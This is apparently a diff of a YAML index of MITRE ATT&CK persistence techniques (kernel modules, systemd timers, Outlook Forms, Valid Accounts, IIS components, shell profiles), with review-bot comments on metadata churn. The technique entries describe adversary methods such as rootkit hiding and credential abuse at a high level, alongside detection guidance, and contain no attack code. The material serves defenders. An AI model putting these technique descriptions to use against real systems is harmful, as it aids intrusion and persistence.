- source_name: Purves Kextpocalypse 2
- url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
description: Richard Purves. (2017, November 9). MDM and the Kextpocalypse
. Retrieved September 23, 2021.
+ url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
- source_name: RSAC 2015 San Francisco Patrick Wardle
- url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
description: Wardle, P. (2015, April). Malware Persistence on OS X Yosemite.
Retrieved April 6, 2018.
+ url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
- source_name: Synack Secure Kernel Extension Broken
- url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
description: Wardle, P. (2017, September 8). High Sierra’s ‘Secure Kernel
Extension Loading’ is Broken. Retrieved April 6, 2018.
+ url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
- source_name: Wikipedia Loadable Kernel Module
- url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
description: Wikipedia. (2018, March 17). Loadable kernel module. Retrieved
April 9, 2018.
- x_mitre_deprecated: false
- revoked: false
- description: |-
- Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming)
-
- When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
-
- Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through kextload
and kextunload
commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
-
- Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
-
- Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
- x_mitre_detection: |
- Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: modprobe
, insmod
, lsmod
, rmmod
, or modinfo
(Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules
and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
-
- Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r)
On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r)
-
- On macOS, monitor for execution of kextload
commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the kext_policy
table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, /var/db/SystemPolicyConfiguration/KextPolicy
.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- x_mitre_is_subtechnique: true
- x_mitre_data_sources:
- - 'Command: Command Execution'
- - 'File: File Creation'
- - 'File: File Modification'
- - 'Kernel: Kernel Module Load'
- - 'Process: Process Creation'
- x_mitre_permissions_required:
- - root
- x_mitre_attack_spec_version: 2.1.0
+ url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.006
atomic_tests: []
T1574.013:
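Review bot: the removed `x_mitre_detection`, `kill_chain_phases`, `x_mitre_data_sources` and `x_mitre_permissions_required` blocks for T1547.006 (the `-` lines from `x_mitre_detection: |` down to `- root`) have no matching `+` lines in the visible part of this hunk; the only additions are `url`, `object_marking_refs` and `x_mitre_attack_spec_version: 3.2.0`. Please confirm these fields are re-emitted higher up in the same hunk (the way the T1137.003 and T1546.004 objects later in this file get their removed keys back in a later hunk) rather than dropped, since this file is grouped under `persistence:` by exactly those kill-chain phases.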
@@ -33961,7 +34384,7 @@ persistence:
url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
description: Microsoft. (2021, November 23). NtQueryInformationProcess function
(winternl.h). Retrieved February 4, 2022.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-22T15:47:33.915Z'
name: KernelCallbackTable
description: |-
Adversaries may abuse the KernelCallbackTable
of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The KernelCallbackTable
can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once user32.dll
is loaded.(Citation: Windows Process Injection KernelCallbackTable)
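Review bot: `modified` for T1574.013 moves backwards here, from `2022-05-11T14:00:00.188Z` to `2022-03-22T15:47:33.915Z`, and the same regression recurs for most `modified` changes in this file (ROMMONkit, IIS Components, Authentication Package, COM Hijacking, Unquoted Path, Startup Items, Network Logon Script, BITS Jobs). Every old value ends in `14:00:00.188Z` or `14:49:39.188Z`, which reads as a bulk release stamp, while the new values look like per-object timestamps. That is plausible if the index was regenerated from a different ATT&CK STIX bundle, but the PR description should say so: anything that diffs these index files on `modified` to detect upstream changes will see a spurious rollback.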
@@ -33987,12 +34410,10 @@ persistence:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1053.006:
technique:
- modified: '2023-09-08T11:56:26.862Z'
+ modified: '2024-10-15T16:42:51.536Z'
name: 'Scheduled Task/Job: Systemd Timers'
description: |-
Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension .timer
that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the systemctl
command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
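Review bot: `x_mitre_attack_spec_version: 2.1.0` is removed for T1574.013 (second `-` line of the hunk) with no replacement anywhere in the hunk, whereas T1547.002 near the end of this file keeps `x_mitre_attack_spec_version: 2.1.0` as unchanged context and only loses `spec_version: '2.1'`. Dropping `spec_version` everywhere is consistent, but the attack-spec field is being handled two different ways; ROMMONkit, IIS Components and Network Logon Script lose it the same way as here. Check whether the source objects really lack the field or the generator discards it when the value is not 3.x.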
@@ -34070,9 +34491,8 @@ persistence:
url: http://man7.org/linux/man-pages/man1/systemd.1.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.006
atomic_tests: []
T1542.004:
@@ -34099,7 +34519,7 @@ persistence:
url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
description: Omar Santos. (2020, October 19). Attackers Continue to Target
Legacy Devices. Retrieved October 20, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T02:18:19.568Z'
name: ROMMONkit
description: |-
Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)
@@ -34121,41 +34541,10 @@ persistence:
- 'Firmware: Firmware Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1137.003:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--a9e2cea0-c805-4bf8-9e31-f5f0513a3634
- type: attack-pattern
- created: '2019-11-07T20:06:02.624Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1137.003
- url: https://attack.mitre.org/techniques/T1137/003
- - source_name: SensePost Outlook Forms
- url: https://sensepost.com/blog/2017/outlook-forms-and-shells/
- description: Stalmans, E. (2017, April 28). Outlook Forms and Shells. Retrieved
- February 4, 2019.
- - source_name: Microsoft Detect Outlook Forms
- url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
- description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
- Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
- 4, 2019.
- - source_name: SensePost NotRuler
- url: https://github.com/sensepost/notruler
- description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
- provides blue teams with the ability to detect Ruler usage against Exchange.
- Retrieved February 4, 2019.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T16:02:00.782Z'
name: Outlook Forms
description: |-
Adversaries may abuse Microsoft Outlook forms to obtain persistence on a compromised system. Outlook forms are used as templates for presentation and functionality in Outlook messages. Custom Outlook forms can be created that will execute code when a specifically crafted email is sent by an adversary utilizing the same custom Outlook form.(Citation: SensePost Outlook Forms)
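Review bot: almost all of the `-` lines for T1137.003 in this hunk (`x_mitre_platforms` through the end of `external_references`) reappear as `+` lines in the next hunk in a different key order, so the diff is mostly reordering noise around a handful of real changes. If the generator can emit keys in a fixed order (or the YAML dumper's key sorting is pinned), these index regenerations become reviewable; as it stands the real deltas have to be found by hand. The same churn shows up for T1546.004 and T1137.004 further down.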
@@ -34164,22 +34553,49 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: |-
Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Command: Command Execution'
- 'Process: Process Creation'
- x_mitre_permissions_required:
- - Administrator
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--a9e2cea0-c805-4bf8-9e31-f5f0513a3634
+ created: '2019-11-07T20:06:02.624Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1137/003
+ external_id: T1137.003
+ - source_name: Microsoft Detect Outlook Forms
+ description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
+ Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
+ 4, 2019.
+ url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
+ - source_name: SensePost NotRuler
+ description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
+ provides blue teams with the ability to detect Ruler usage against Exchange.
+ Retrieved February 4, 2019.
+ url: https://github.com/sensepost/notruler
+ - source_name: SensePost Outlook Forms
+ description: Stalmans, E. (2017, April 28). Outlook Forms and Shells. Retrieved
+ February 4, 2019.
+ url: https://sensepost.com/blog/2017/outlook-forms-and-shells/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1574:
technique:
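Review bot: `x_mitre_permissions_required` (`Administrator`, `User`) for T1137.003 is removed at the `-` lines just before `+ type: attack-pattern` and never re-added, while `x_mitre_deprecated: false` and `revoked: false` are new. T1547.002, T1037.005 and T1546.004 elsewhere in this file keep their permissions lists. If the field was dropped upstream together with the bump of `x_mitre_version` to 1.2 that is fine, but it is a content change hidden inside a reordering hunk and deserves a line in the PR description. The same applies to T1137.004 later in this file.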
@@ -34245,7 +34661,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1543.005:
technique:
@@ -34319,11 +34734,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:09:46.024Z'
name: Valid Accounts
description: |-
Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -34340,7 +34754,6 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- x_mitre_attack_spec_version: 3.1.0
x_mitre_contributors:
- Syed Ummar Farooqh, McAfee
- Prasad Somasamudram, McAfee
@@ -34350,7 +34763,7 @@ persistence:
- Netskope
- Mark Wee
- Praetorian
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -34359,19 +34772,17 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '2.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
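Review bot: the platform list for T1078 loses `Azure AD`, `Office 365` and `Google Workspace` and gains `Office Suite` and `Identity Provider` (with `x_mitre_version` going from 2.6 to 2.7); T1556.006, T1546, T1137.003 and T1137.004 are renamed the same way in this file. Anything in the repo that is keyed on the old platform names will stop matching these techniques, so this PR should either regenerate those artifacts in the same change or state why they are unaffected.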
@@ -34419,11 +34830,12 @@ persistence:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1556.006:
technique:
- modified: '2024-04-16T00:20:21.488Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Multi-Factor Authentication
description: "Adversaries may disable or modify multi-factor authentication
(MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce
@@ -34452,24 +34864,26 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Liran Ravich, CardinalOps
- Muhammad Moiz Arshad, @5T34L7H
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- Linux
- macOS
- x_mitre_version: '1.2'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
@@ -34504,9 +34918,6 @@ persistence:
url: https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1505.004:
technique:
@@ -34566,7 +34977,7 @@ persistence:
description: Falcone, R. (2018, January 25). OilRig uses RGDoor IIS Backdoor
on Targets in the Middle East. Retrieved July 6, 2018.
source_name: Unit 42 RGDoor Jan 2018
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T15:06:24.161Z'
name: IIS Components
description: |-
Adversaries may install malicious components that run on Internet Information Services (IIS) web servers to establish persistence. IIS provides several mechanisms to extend the functionality of the web servers. For example, Internet Server Application Programming Interface (ISAPI) extensions and filters can be installed to examine and/or modify incoming and outgoing IIS web requests. Extensions and filters are deployed as DLL files that export three functions: Get{Extension/Filter}Version
, Http{Extension/Filter}Proc
, and (optionally) Terminate{Extension/Filter}
. IIS modules may also be installed to extend IIS web servers.(Citation: Microsoft ISAPI Extension Overview 2017)(Citation: Microsoft ISAPI Filter Overview 2017)(Citation: IIS Backdoor 2011)(Citation: Trustwave IIS Module 2013)
@@ -34591,13 +35002,11 @@ persistence:
x_mitre_permissions_required:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1505.004
atomic_tests: []
T1546:
technique:
- modified: '2024-03-01T15:49:15.588Z'
+ modified: '2024-10-15T15:57:00.731Z'
name: Event Triggered Execution
description: "Adversaries may establish persistence and/or elevate privileges
using system mechanisms that trigger execution based on specific events. Various
@@ -34650,8 +35059,8 @@ persistence:
- Windows
- SaaS
- IaaS
- - Office 365
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Module: Module Load'
- 'WMI: WMI Creation'
@@ -34699,78 +35108,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546
atomic_tests: []
T1546.004:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Robert Wilson
- - Tony Lambert, Red Canary
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
- type: attack-pattern
- created: '2020-01-24T14:13:45.936Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1546.004
- url: https://attack.mitre.org/techniques/T1546/004
- - source_name: intezer-kaiji-malware
- url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
- description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
- turning to Golang. Retrieved December 17, 2020.'
- - source_name: bencane blog bashrc
- url: https://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
- description: Benjamin Cane. (2013, September 16). Understanding a little more
- about /etc/profile and /etc/bashrc. Retrieved February 25, 2021.
- - source_name: anomali-rocke-tactics
- url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
- description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
- Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
- December 17, 2020.
- - source_name: Linux manual bash invocation
- url: https://wiki.archlinux.org/index.php/Bash#Invocation
- description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
- - source_name: Tsunami
- url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
- description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
- Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
- - source_name: anomali-linux-rabbit
- url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
- description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
- Malware Out of a Hat. Retrieved December 17, 2020.
- - source_name: Magento
- url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
- description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
- Vector. Retrieved December 17, 2020.
- - source_name: ScriptingOSX zsh
- url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
- description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
- Files. Retrieved February 25, 2021.'
- - source_name: PersistentJXA_leopitt
- url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
- description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
- for macOS. Retrieved January 11, 2021.
- - source_name: code_persistence_zsh
- url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
- description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
- Retrieved January 11, 2021.
- - source_name: macOS MS office sandbox escape
- url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
- description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
- Retrieved August 20, 2021.
- - source_name: ESF_filemonitor
- url: https://objective-see.com/blog/blog_0x48.html
- description: Patrick Wardle. (2019, September 17). Writing a File Monitor
- with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-25T15:02:24.143Z'
name: 'Event Triggered Execution: .bash_profile .bashrc and .shrc'
description: "Adversaries may establish persistence through executing malicious
commands triggered by a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s
@@ -34818,6 +35160,10 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Robert Wilson
+ - Tony Lambert, Red Canary
+ x_mitre_deprecated: false
x_mitre_detection: "While users may customize their shell profile files, there
are only certain types of commands that typically appear in these files. Monitor
for abnormal commands such as execution of unknown programs, opening network
@@ -34828,9 +35174,13 @@ persistence:
events monitoring these specific files.(Citation: ESF_filemonitor) \n\nFor
most Linux and macOS systems, a list of file paths for valid shell options
available on a system are located in the /etc/shells
file.\n"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
x_mitre_version: '2.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: Process Creation'
- 'File: File Creation'
@@ -34839,8 +35189,67 @@ persistence:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
+ created: '2020-01-24T14:13:45.936Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1546/004
+ external_id: T1546.004
+ - source_name: anomali-linux-rabbit
+ description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
+ Malware Out of a Hat. Retrieved December 17, 2020.
+ url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
+ - source_name: anomali-rocke-tactics
+ description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
+ Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
+ December 17, 2020.
+ url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
+ - source_name: Linux manual bash invocation
+ description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
+ url: https://wiki.archlinux.org/index.php/Bash#Invocation
+ - source_name: ScriptingOSX zsh
+ description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
+ Files. Retrieved February 25, 2021.'
+ url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
+ - source_name: bencane blog bashrc
+ description: Benjamin Cane. (2013, September 16). Understanding a little more
+ about /etc/profile and /etc/bashrc. Retrieved September 25, 2024.
+ url: https://web.archive.org/web/20220316014323/http://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
+ - source_name: macOS MS office sandbox escape
+ description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
+ Retrieved August 20, 2021.
+ url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
+ - source_name: Magento
+ description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
+ Vector. Retrieved December 17, 2020.
+ url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
+ - source_name: Tsunami
+ description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
+ Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
+ url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
+ - source_name: PersistentJXA_leopitt
+ description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
+ for macOS. Retrieved January 11, 2021.
+ url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
+ - source_name: code_persistence_zsh
+ description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
+ Retrieved January 11, 2021.
+ url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
+ - source_name: ESF_filemonitor
+ description: Patrick Wardle. (2019, September 17). Writing a File Monitor
+ with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
+ url: https://objective-see.com/blog/blog_0x48.html
+ - source_name: intezer-kaiji-malware
+ description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
+ turning to Golang. Retrieved December 17, 2020.'
+ url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1546.004
atomic_tests: []
T1547.002:
